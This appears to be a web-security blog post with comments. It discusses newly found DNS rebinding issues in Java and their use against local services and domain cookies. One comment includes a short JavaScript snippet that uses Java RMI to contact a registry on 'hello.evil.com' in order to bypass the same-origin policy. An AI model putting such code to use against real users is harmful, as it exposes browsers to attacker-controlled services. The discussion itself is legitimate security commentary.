Cenzic 232 Patent
Paid Advertising
web application security lab

DNS Rebinding In Java Is Back

9 posts remaining…

Stefano Di Paola has an interesting article about DNS Rebinding in Java. Apparently he’s found a way to bring back some of the older exploits that were supposedly fixed in Java back in 2007-2008 timeframe. Really cool read. Half way through reading it I realized that this would enable exploits like the one where sites often have localhost.whatever.com tied back to 127.0.0.1. The old exploit worked in that if you could ever find an XSS in a local service you could set cookies for whatever.com domain, or read any cookies that were set to the entire domain. It’s a nasty exploit, but rare because there don’t tend to be a lot of local services installed on desktop computers that are vulnerable to XSS by default.

Then I kept reading and he enumerates that exact use case - great minds think alike! Anyway, this apparently will be fixed in a future update, but now that we’ve seen DNS rebinding hit Java twice, I think Java needs to have a much more critical eye. Things like this shouldn’t be sitting around for years before they’re noticed. Like inter-protocol exploitation this research needs a lot more eyes. Great work by Stefano!

3 Responses to “DNS Rebinding In Java Is Back”

  1. Joshbw Says:

    There are a lot of other reasons why Java needs to have a much more critical eye:

    http://arstechnica.com/business/news/2010/10/microsoft-sees-unprecedented-wave-of-java-malware-exploits.ars

    I gave up on client side Java a long time ago. Most of the apps using it are utterly terrible and Sun/Oracle can’t seem to write a secure runtime for clients. A JVM is not touching my desktop.

  2. Stefano Di Paola Says:

    Hey Robert, thanks for the kind words :)

    I hope the issue have been fixed in the Java update 22. But I didn’t check if there are any bypass.

    Consider reading the following post:
    http://blog.mindedsecurity.com/2010/10/java-dsn-rebinding-java-same-ip-policy.html

    which describes what could happen putting DNS Rebinding and Java Same IP Origin Policy.

  3. Sasha Says:

    Java has many dark alleys.

    Java Remote Method Invocation (RMI) for JS LiveConnect for example: java.rmi in JavaScript:

    c = java.rmi.registry.LocateRegistry;
    r = c.getRegistry(”hello.evil.com”);
    s = r.lookup(”lol”);
    s.requestService();

    Then the attacker can set up and run his own remote java application that allows any IP to communicate with that client, thus bypassing SOP. Not to mention Naming.rebind() :D

    So yeah, running Java in your browser these days is asking for problems. Enjoy. ;)